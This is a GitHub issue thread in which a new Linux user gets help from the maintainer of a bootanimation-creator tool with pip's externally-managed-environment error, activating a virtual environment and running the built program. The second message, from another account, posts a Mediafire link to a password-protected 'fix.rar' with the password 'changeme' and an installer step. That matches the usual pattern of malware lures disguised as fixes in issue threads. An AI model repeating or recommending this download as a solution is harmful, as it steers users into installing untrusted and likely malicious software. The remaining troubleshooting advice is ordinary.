### ISSUE TITLE
Ubuntu pip externally-managed-environment error

### ISSUE THREAD

**Issue by Posifurg** [MajliTech/bootanimation-creator#4]
![Screenshot from 2024-08-26 11-38-53](https://github.com/user-attachments/assets/6050c22d-eaa9-4bcf-94d4-64f0e5071008)

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MajliTech** [comment]
you haven't activated the vent. look in `bin` for an activate script.

**Comment by MajliTech** [comment]
what the hell what did I delete

**Comment by Posifurg** [comment]
theres like 4 activate files
![image](https://github.com/user-attachments/assets/fbe784c7-52af-479a-8804-721e04808063)

**Comment by Posifurg** [comment]
oops sorry didnt mean to close it

**Comment by MajliTech** [comment]
I see you use bash. open up a terminal window, execute `source activate.sh` and operate inside this terminal window.

**Comment by Posifurg** [comment]
Now src/requirements.txt isnt being found

**Comment by Posifurg** [comment]
Oh it was because i went back from bootanimation-creator to ~ earlier, but now pyinstaller isnt being recognized

**Comment by MajliTech** [comment]
pyinstaller isn't needed for this to run - which guide are you following? if you pip installed then just `python3 src/main.py`

**Comment by MajliTech** [comment]
pyinstaller isn't needed for this to run - which guide are you following? if you pip installed then just `python3 src/main.py`

**Comment by Posifurg** [comment]
![image](https://github.com/user-attachments/assets/e9b64858-2c1d-4395-a9a6-eebda9f9a340)

**Comment by MajliTech** [comment]
is the issue solved? please close if yes, otherwise don't hesitate to ask.

**Comment by Posifurg** [comment]
oh sorry, but im trying to make the app from "main" but it wont work (sorry
im new to linux idk how this shit works)

**Comment by MajliTech** [comment]
it's no problem, are you still stuck somewhere?

**Comment by Posifurg** [comment]
[Screencast from 2024-08-26 13-49-33.webm](https://github.com/user-attachments/assets/afdc63e7-0094-499b-b6fc-d228672e31e0)
im trying to build the executable (or whatever so it appears in the app library) but it doesnt do anything

**Comment by MajliTech** [comment]
congrats, you have built the executable. it has no UI, open the terminal window there and run it from there.

Aug 26, 2024, 8:52 PM by ***@***.***:
